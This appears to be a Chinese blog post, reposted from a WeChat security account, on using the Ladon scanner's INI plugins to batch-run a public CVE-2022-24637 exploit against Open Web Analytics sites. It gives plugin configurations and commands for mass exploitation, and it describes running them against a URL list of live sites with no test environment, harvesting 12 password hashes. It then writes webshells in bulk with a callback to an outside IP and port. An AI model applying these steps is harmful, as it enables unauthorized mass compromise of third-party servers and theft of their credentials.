本文主要教大家如何配置Ladon的INI插件,实现快速批量验证POC。该漏洞除了练手或提交SRC,可能没什么用,OWA登陆界面如下
Ladon插件 CVE-2022-24637.ini
INI插件最大的优势在于,可调用任意语言编写的POC,就是说在没有源码的情况下也可以,只要知道如何使用POC,然后填写参数,设置URL变量或IP变量即可。当别人放出POC时,我们只需要验证出一个成功的,即可Ladon批量
[Ladon]exe=pythonarg=CVE-2022-24637.py $ip$ -clog=true
批量命令
Ladon url.txt cve-2022-24637
由于本地没搭有环境,EXP也是github上找的,并不知道成功是怎样的,所以没有重定向,先让Ladon跑一些URL,成功如上图所示,检测出漏洞时同时返回密码HASH,当然也有一些有漏洞但无法获取HASH的。重定向后,稍等一分钟,就自动获取了12个密码。
查看密码对应URL,再使用EXP写入webshell
批量GetShell配置
[Ladon]exe=pythonarg=CVE-2022-24637.py $ip$ -i 123.123.123.123 -p 4444 -u adminlog=true
webshell是随机地址,我们可以重定向输出结果
Ladon url.txt GetShell.ini > shell.txtPS: 与Ladon联动的最佳Poc为.net编写的程序或DLL,可使用LadonEXP一键生成大部份WEB相关POC,非WEB洞需自己编写。
POC: https://www.exploit-db.com/exploits/51026
相关文章
Ladon9.3.0 & CobaltStrike & Exchange ProxyShell漏洞复现
Ladon 9.2.1 Cisco漏洞复现批量GetShell、IIS后门、指纹识别、CMS识别
LadonExp教程CVE-2022–21661 WordPress漏洞复现
原文始发于微信公众号(K8实验室):CVE-2022-24637: 未授权RCE Open Web Analytics (OWA)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论